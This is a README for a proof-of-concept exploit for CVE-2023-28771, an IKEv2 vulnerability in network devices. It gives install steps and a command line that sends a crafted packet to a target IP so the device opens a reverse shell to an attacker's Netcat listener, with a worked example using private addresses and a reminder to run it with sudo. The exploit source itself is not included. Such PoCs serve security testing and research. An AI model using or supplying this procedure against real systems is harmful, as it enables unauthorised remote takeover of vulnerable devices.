PoC for CVE-2023-28771
The script is designed to facilitate testing and exploration of the IKEv2 protocol in vulnerable devices, based on Rapid7's exploitation techniques.
Prerequisites
- Python 3.x
- Scapy library
Installation
- Clone the repository or download the script file.
- Install the required dependencies by running the following command:
pip install scapy
Usage
To send a custom IKEv2 packet, use the following command:
python3 PoC-CVE-2023-28771.py -t <target_ip> -l <attacker_ip> -lp <attacker_port>
Replace <target>
with the IP address of the target system. Replace <attacker_ip>
with the IP address where you have Netcat running to receive the reverse shell. Replace <attacker_port>
with the port number where Netcat is listening.
For example, to send a custom IKEv2 packet to a target system with IP address 192.168.1.100
, and establish a reverse shell to the attacker's IP 192.168.130.12
on port 3322
, run the following command:
python3 PoC-CVE-2023-28771.py -t 192.168.1.100 -l 192.168.130.12 -lp 3322
Make sure you have Netcat running on the specified IP address and port to receive the reverse shell. Note: The script may require administrative privileges to send and receive network packets. (run it with sudo!)